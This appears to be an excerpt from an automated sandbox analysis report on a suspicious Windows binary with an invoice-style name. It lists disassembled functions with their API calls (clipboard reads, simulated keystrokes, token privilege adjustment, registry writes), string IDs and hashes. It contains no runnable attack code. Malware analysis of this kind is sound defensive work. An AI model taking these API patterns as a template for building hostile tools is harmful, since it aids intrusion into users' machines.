                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 302779176-4164748364
                                    • Opcode ID: 91b5d427ab954b4984cf5211a8ca76bdc9e3d0c9926b6e27e9357965acf989b1
                                    • Instruction ID: 3d43dbc397b87562c92bce18548b2b7c216522c88b0ecbacd83f2b24042c2c11
                                    • Opcode Fuzzy Hash: 91b5d427ab954b4984cf5211a8ca76bdc9e3d0c9926b6e27e9357965acf989b1
                                    • Instruction Fuzzy Hash: 5942AF70604245AFD721EF28C888FEABBE5FF48324F14061DF695872E1D7319854EBA2
                                    Function 00F8804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F8873F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: 043cf0b5a187276e24a1afb35cb7bb41d8499c506a8f91033666bda44a5cc94f
                                    • Instruction ID: 94e23f13753670fd8fc417da093096c99e9619395619f3fa27dd1fcede23085f
                                    • Opcode Fuzzy Hash: 043cf0b5a187276e24a1afb35cb7bb41d8499c506a8f91033666bda44a5cc94f
                                    • Instruction Fuzzy Hash: DE12B071A00258AFEB24AF24CC49FEE7BB4EF45360F644129F515EB1A1EF748946EB10
                                    Function 00F1710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
                                    • Opcode ID: 973f858216b5d545364bb8b48c90841d17f63c39ce95f96d382688b969a03fbd
                                    • Instruction ID: 26007bd4831210bdcfdf6d5b4561606db8c35b2631cf16b156e609ff979dda01
                                    • Opcode Fuzzy Hash: 973f858216b5d545364bb8b48c90841d17f63c39ce95f96d382688b969a03fbd
                                    • Instruction Fuzzy Hash: A093A372E04215DBDB24CF58C8817EDB7B1FF48365F25816AEE45AB280E7709E85EB40
                                    Function 00F04A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 00F04A3D
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F3DA8E
                                    • IsIconic.USER32(?), ref: 00F3DA97
                                    • ShowWindow.USER32(?,00000009), ref: 00F3DAA4
                                    • SetForegroundWindow.USER32(?), ref: 00F3DAAE
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3DAC4
                                    • GetCurrentThreadId.KERNEL32 ref: 00F3DACB
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3DAD7
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3DAE8
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3DAF0
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F3DAF8
                                    • SetForegroundWindow.USER32(?), ref: 00F3DAFB
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB10
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB1B
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB25
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB2A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB33
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB38
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB42
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB47
                                    • SetForegroundWindow.USER32(?), ref: 00F3DB4A
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00F3DB71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 7e8402c7eef66440b1ed85ed18c0d27e7f0584823fe8e8442efe1ab815fc5f0a
                                    • Instruction ID: 859b7dae0bd4e4c1655a675f97ffd2786b1fb8dbd25e6573ac0ec1febd4c80df
                                    • Opcode Fuzzy Hash: 7e8402c7eef66440b1ed85ed18c0d27e7f0584823fe8e8442efe1ab815fc5f0a
                                    • Instruction Fuzzy Hash: 28315271A4031CBFEB216F619C49FBE7E6CEB44B60F154025FA05EA1D1D6B05911BBA0
                                    Function 00F7425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(00F8F910), ref: 00F74284
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F74292
                                    • GetClipboardData.USER32(0000000D), ref: 00F7429A
                                    • CloseClipboard.USER32 ref: 00F742A6
                                    • GlobalFix.KERNEL32(00000000), ref: 00F742C2
                                    • CloseClipboard.USER32 ref: 00F742CC
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F742E1
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F742EE
                                    • GetClipboardData.USER32(00000001), ref: 00F742F6
                                    • GlobalFix.KERNEL32(00000000), ref: 00F74303
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F74337
                                    • CloseClipboard.USER32 ref: 00F74447
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                                    • String ID:
                                    • API String ID: 941120096-0
                                    • Opcode ID: 823e9c7863be834db8f18e514034491326a86b5d6c8cc22411307f8964fc2464
                                    • Instruction ID: 43acf243da1250e6d8d9d3435b590902035f51d1dbab441591a0f71fdefd28db
                                    • Opcode Fuzzy Hash: 823e9c7863be834db8f18e514034491326a86b5d6c8cc22411307f8964fc2464
                                    • Instruction Fuzzy Hash: F3517171204305AFD701EF64DC85FBE77A8AB84B10F10452AF95AD21E2DB74A909BB63
                                    Function 00F58858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                      • Part of subcall function 00F58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                      • Part of subcall function 00F58CC3: GetLastError.KERNEL32 ref: 00F58D47
                                    • _memset.LIBCMT ref: 00F5889B
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F588ED
                                    • CloseHandle.KERNEL32(?), ref: 00F588FE
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F58915
                                    • GetProcessWindowStation.USER32 ref: 00F5892E
                                    • SetProcessWindowStation.USER32(00000000), ref: 00F58938
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F58952
                                      • Part of subcall function 00F58713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58851), ref: 00F58728
                                      • Part of subcall function 00F58713: CloseHandle.KERNEL32(?,?,00F58851), ref: 00F5873A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 9102f9daa5e760598665a840f81a3ef34ec630ba4b24060b058a2074412b5e1f
                                    • Instruction ID: 33f0d1010386f1e81dfb0c3811f924b2c914f231bb6b1a396333fa24d4c6af05
                                    • Opcode Fuzzy Hash: 9102f9daa5e760598665a840f81a3ef34ec630ba4b24060b058a2074412b5e1f
                                    • Instruction Fuzzy Hash: C1812B71D00209BFDF11DFA4DC45AEE7BB8EF04355F18416AFE10B6161DB398A1AAB60
                                    Function 00F6C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F6C9F8
                                    • FindClose.KERNEL32(00000000), ref: 00F6CA4C
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6CA71
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6CA88
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F6CAAF
                                    • __swprintf.LIBCMT ref: 00F6CAFB
                                    • __swprintf.LIBCMT ref: 00F6CB3E
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • __swprintf.LIBCMT ref: 00F6CB92
                                      • Part of subcall function 00F238D8: __woutput_l.LIBCMT ref: 00F23931
                                    • __swprintf.LIBCMT ref: 00F6CBE0
                                      • Part of subcall function 00F238D8: __flsbuf.LIBCMT ref: 00F23953
                                      • Part of subcall function 00F238D8: __flsbuf.LIBCMT ref: 00F2396B
                                    • __swprintf.LIBCMT ref: 00F6CC2F
                                    • __swprintf.LIBCMT ref: 00F6CC7E
                                    • __swprintf.LIBCMT ref: 00F6CCCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: aaf83713157e9255d732928bca3f909ea42f549ed5948036e372a6e3c6d029b8
                                    • Instruction ID: 3160d1bb22578a377314021086476303e2982e4ec100a7fa2c6da0911a7243a5
                                    • Opcode Fuzzy Hash: aaf83713157e9255d732928bca3f909ea42f549ed5948036e372a6e3c6d029b8
                                    • Instruction Fuzzy Hash: BDA121B2508305ABC710EBA4CC95DAFB7ECEF94700F404919F585C7192FA78DA48EB62
                                    Function 00F6F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F6F221
                                    • _wcscmp.LIBCMT ref: 00F6F236
                                    • _wcscmp.LIBCMT ref: 00F6F24D
                                    • GetFileAttributesW.KERNEL32(?), ref: 00F6F25F
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F6F279
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F6F291
                                    • FindClose.KERNEL32(00000000), ref: 00F6F29C
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F2B8
                                    • _wcscmp.LIBCMT ref: 00F6F2DF
                                    • _wcscmp.LIBCMT ref: 00F6F2F6
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F308
                                    • SetCurrentDirectoryW.KERNEL32(00FBA5A0), ref: 00F6F326
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F330
                                    • FindClose.KERNEL32(00000000), ref: 00F6F33D
                                    • FindClose.KERNEL32(00000000), ref: 00F6F34F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 74cc76f9196a2f710ae1d9567b2bbd7630d8336c4d51c9fbeb2b0e60e71f20fc
                                    • Instruction ID: 13ba9d8b512106567f1983dc2568088bb1047595a286f4b0a76c216741320da3
                                    • Opcode Fuzzy Hash: 74cc76f9196a2f710ae1d9567b2bbd7630d8336c4d51c9fbeb2b0e60e71f20fc
                                    • Instruction Fuzzy Hash: 1131A076A0121D6EDF20DBB4EC59AEE77ACAF48370F144175E814D31A0EB34DA49AF60
                                    Function 00F80AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80BDE
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F8F910,00000000,?,00000000,?,?), ref: 00F80C4C
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F80C94
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F80D1D
                                    • RegCloseKey.ADVAPI32(?), ref: 00F8103D
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F8104A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 60be5d0429b19bcf7bdce00d179153a5f97a4aa78204148646067f6ac6c121c1
                                    • Instruction ID: 95e2ae2a69916fa35c7260d7f34ce1eccec4732b839c05926ff3ca3456c33471
                                    • Opcode Fuzzy Hash: 60be5d0429b19bcf7bdce00d179153a5f97a4aa78204148646067f6ac6c121c1
                                    • Instruction Fuzzy Hash: B902A0756046119FCB14EF18C881E6AB7E5FF88720F04855DF8899B3A2DB78EC45EB41
                                    Function 00F8C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • DragQueryPoint.SHELL32(?,?), ref: 00F8C917
                                      • Part of subcall function 00F8ADF1: ClientToScreen.USER32(?,?), ref: 00F8AE1A
                                      • Part of subcall function 00F8ADF1: GetWindowRect.USER32(?,?), ref: 00F8AE90
                                      • Part of subcall function 00F8ADF1: PtInRect.USER32(?,?,00F8C304), ref: 00F8AEA0
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C980
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F8C98B
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F8C9AE
                                    • _wcscat.LIBCMT ref: 00F8C9DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F8C9F5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F8CA0E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F8CA25
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F8CA47
                                    • DragFinish.SHELL32(?), ref: 00F8CA4E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F8CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: ac78c01bf452dec2c745e2e6d4e706815c8de469859853b2f71d941125cc6d34
                                    • Instruction ID: a23445d6325dc7cc240fe4a8cfd5495f589d1642e87a976d219710b4b6cd3657
                                    • Opcode Fuzzy Hash: ac78c01bf452dec2c745e2e6d4e706815c8de469859853b2f71d941125cc6d34
                                    • Instruction Fuzzy Hash: AC616F71608305AFC701EF64DC85D9FBBE8EF88710F00091EF591971A1DB749A49EBA2
                                    Function 00F6F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F6F37E
                                    • _wcscmp.LIBCMT ref: 00F6F393
                                    • _wcscmp.LIBCMT ref: 00F6F3AA
                                      • Part of subcall function 00F645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F645DC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F6F3D9
                                    • FindClose.KERNEL32(00000000), ref: 00F6F3E4
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F400
                                    • _wcscmp.LIBCMT ref: 00F6F427
                                    • _wcscmp.LIBCMT ref: 00F6F43E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F450
                                    • SetCurrentDirectoryW.KERNEL32(00FBA5A0), ref: 00F6F46E
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F478
                                    • FindClose.KERNEL32(00000000), ref: 00F6F485
                                    • FindClose.KERNEL32(00000000), ref: 00F6F497
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 172cfd5569faa93fc6aa596f3804381d2ce5db77cd9f78680330c5f2c4013288
                                    • Instruction ID: 740d26d46a23eb2cd30eb142a1e5c74f1e2cfa55c1c312967a30f3940af39f3c
                                    • Opcode Fuzzy Hash: 172cfd5569faa93fc6aa596f3804381d2ce5db77cd9f78680330c5f2c4013288
                                    • Instruction Fuzzy Hash: C431A4729012196ECF10EBA4FC89AEE77AC9F49370F140175E850E21A0DB35DA48FB64
                                    Function 00F8C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F8C4EC
                                    • GetFocus.USER32 ref: 00F8C4FC
                                    • GetDlgCtrlID.USER32(00000000), ref: 00F8C507
                                    • _memset.LIBCMT ref: 00F8C632
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F8C65D
                                    • GetMenuItemCount.USER32(?), ref: 00F8C67D
                                    • GetMenuItemID.USER32(?,00000000), ref: 00F8C690
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F8C6C4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F8C70C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F8C744
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F8C779
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
